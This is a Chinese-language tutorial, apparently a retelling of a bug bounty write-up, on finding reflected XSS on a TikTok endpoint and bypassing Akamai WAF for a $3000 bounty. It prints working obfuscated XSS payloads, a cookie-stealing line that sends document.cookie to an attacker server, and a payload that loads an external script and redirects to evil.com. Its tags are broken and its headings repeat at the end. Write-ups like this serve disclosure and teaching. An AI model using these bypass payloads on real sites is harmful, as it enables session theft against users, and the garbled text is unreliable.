TikTok漏洞挖掘实战：从XSS绕过到3000美元赏金<\/h1>

前言<\/h2>
本教学文档详细解析一位白帽黑客在TikTok漏洞赏金项目中发现XSS漏洞并成功绕过WAF的全过程，最终获得3000美元赏金的实战案例。文档将分步骤还原整个漏洞挖掘流程，包含技术细节、绕过技巧和Payload构造方法。<\/p>

1. 前期侦察<\/h2>

1.1 目标发现<\/h3>

使用urlscan.io扫描TikTok域名相关端点<\/li>
获取约1万个URL的庞大列表<\/li>

手动浏览发现可疑端点：活动分享功能路径下带有多个参数的URL<\/li> <\/ul>

1.2 初步测试<\/h3>

测试region<\/code>参数是否存在XSS漏洞<\/li>
初始无害Payload测试：?region=id'"><u>testest<\/u><\/code><\/li>

发现无任何过滤和编码，存在反射可能性<\/li>
<\/ul>
2. WAF识别与初步绕过尝试<\/h2>
2.1 WAF识别<\/h3>

使用经典XSS Payload测试："><\/code><\/li>
被Akamai WAF拦截（TikTok使用的WAF解决方案）<\/li>
<\/ul>
2.2 绕过技术研究<\/h3>
研究Akamai WAF绕过技术，重点关注：<\/p>

字符串混淆<\/li>
大小写敏感性<\/li>
标签规避技术<\/li>
<\/ul>
2.3 初步绕过尝试<\/h3>
尝试多种Payload变体：<\/p>

<\/ScRiPt><\/code> → 被拦截<\/li>
<\/SCRIPT><\/code> → 被拦截<\/li>
<\/ScRpt><\/code> → 未拦截但不可用<\/li>
<\/Script+xxx><\/code> → 短暂绕过，但最终被过滤<\/li>
<\/ol>
3. Payload进化与成功绕过<\/h2>
3.1 有效绕过字符串<\/h3>
发现有效绕过字符串：<\/p>
}<x>xxx<Script+xxx><\/script%20x><\/x><x>xxx<
<\/code><\/pre>

成功绕过WAF过滤<\/li>
但alert()<\/code>、confirm()<\/code>和prompt()<\/code>在运行时仍被阻止<\/li>
<\/ul>
3.2 初步提交策略<\/h3>

先提交漏洞，使用开放重定向作为PoC<\/li>
两天后收到HackerOne回复：开放重定向不在漏洞范围内，建议提升为XSS或Cookie窃取<\/li>
<\/ul>
4. 制作有效XSS Payload<\/h2>
4.1 绕过alert限制<\/h3>
由于直接alert()<\/code>被拦截，采用混淆访问方式：<\/p>

使用字符串拼接：window['al'+'ert']<\/code><\/li>
添加注释混淆：window\/*xxx*\/<\/code><\/li>
<\/ul>
完整Payload：<\/p>
<x>xxx<Script+xxx><script%20x>window\/*xxx*\/['al'%2b'ert'](1);\/\/<\/script%20x><\/x><x>xxx<
<\/code><\/pre>

成功触发XSS<\/li>
<\/ul>
4.2 漏洞评级提升<\/h3>
HackerOne反馈：仅alert弹窗算低危漏洞，建议改进PoC提升等级<\/p>
4.3 实现Cookie窃取<\/h3>
构造窃取Cookie的Payload：<\/p>
window\/*xxx*\/['loca' + 'tion'] = 'http:\/\/<your-server>?cookie=' + document\/*xxx*\/['coo' + 'kie'];
<\/code><\/pre>
完整高级Payload：<\/p>
}<x>xxx<Script+xxx><Script+xxx>Object.prototype.BOOMR = 1;Object.prototype.url = 'https:\/\/portswigger-labs.net\/xss\/xss.js';location.replace('https:\/\/evil.com');<\/script%20x><\/x><x>xxx<
<\/code><\/pre>

确认有效XSS<\/li>
一天后获得1000美元赏金<\/li>
<\/ul>
5. 漏洞扩展与总收益<\/h2>

在同一路径中发现更多具有相同漏洞的端点<\/li>
共发现三个漏洞端点<\/li>
总赏金：3000美元<\/li>
<\/ul>
6. 关键技术与技巧总结<\/h2>
6.1 WAF绕过技巧<\/h3>

标签混淆<\/strong>：使用非标准标签如<Script+xxx><\/code><\/li>
大小写变异<\/strong>：混合大小写如<\/ScRiPt><\/code><\/li>
字符串拼接<\/strong>：'al'+'ert'<\/code>代替alert<\/code><\/li>
注释混淆<\/strong>：window\/*xxx*\/<\/code>插入无关注释<\/li>
特殊字符利用<\/strong>：%20<\/code>代替空格<\/li>
<\/ol>
6.2 Payload构造原则<\/h3>

分阶段测试，从简单到复杂<\/li>
使用无害Payload确认基本漏洞<\/li>
逐步增加功能，避免一次性触发过多防护<\/li>
利用字符串拼接绕过关键字检测<\/li>
添加冗余字符增加混淆度<\/li>
<\/ol>
6.3 漏洞报告策略<\/h3>

初始提交保持简单，证明漏洞存在<\/li>
根据平台反馈逐步提升PoC复杂度<\/li>
从反射XSS升级到Cookie窃取提升漏洞等级<\/li>
发现同类漏洞后批量报告<\/li>
<\/ol>
7. 防御建议<\/h2>
针对此类漏洞，防御措施应包括：<\/p>

对所有用户输入进行严格过滤和编码<\/li>
实施内容安全策略(CSP)<\/li>
对输出上下文敏感的编码<\/li>
定期更新WAF规则<\/li>
对敏感操作实施二次验证<\/li>
<\/ol>
8. 参考资源<\/h2>

原文：No Gaming Just Hacking: How I Made $3k on TikTok Bug Bounty Program<\/a><\/li>
urlscan.io：用于初始侦察<\/li>
Akamai WAF绕过技术研究资料<\/li>
<\/ul>
通过本案例，我们学习了从目标发现到最终获得高额赏金的完整漏洞挖掘流程，特别是针对严格WAF环境的XSS绕过技术。这种分阶段、逐步升级的测试方法值得在类似场景中应用。<\/p>

TikTok漏洞挖掘实战：从XSS绕过到3000美元赏金<\/h1>

前言<\/h2> 本教学文档详细解析一位白帽黑客在TikTok漏洞赏金项目中发现XSS漏洞并成功绕过WAF的全过程，最终获得3000美元赏金的实战案例。文档将分步骤还原整个漏洞挖掘流程，包含技术细节、绕过技巧和Payload构造方法。<\/p>

1. 前期侦察<\/h2>

2. WAF识别与初步绕过尝试<\/h2>

3. Payload进化与成功绕过<\/h2>

4. 制作有效XSS Payload<\/h2>

4.2 漏洞评级提升<\/h3> HackerOne反馈：仅alert弹窗算低危漏洞，建议改进PoC提升等级<\/p>

6. 关键技术与技巧总结<\/h2>

前言<\/h2>
本教学文档详细解析一位白帽黑客在TikTok漏洞赏金项目中发现XSS漏洞并成功绕过WAF的全过程，最终获得3000美元赏金的实战案例。文档将分步骤还原整个漏洞挖掘流程，包含技术细节、绕过技巧和Payload构造方法。<\/p>

4.2 漏洞评级提升<\/h3>
HackerOne反馈：仅alert弹窗算低危漏洞，建议改进PoC提升等级<\/p>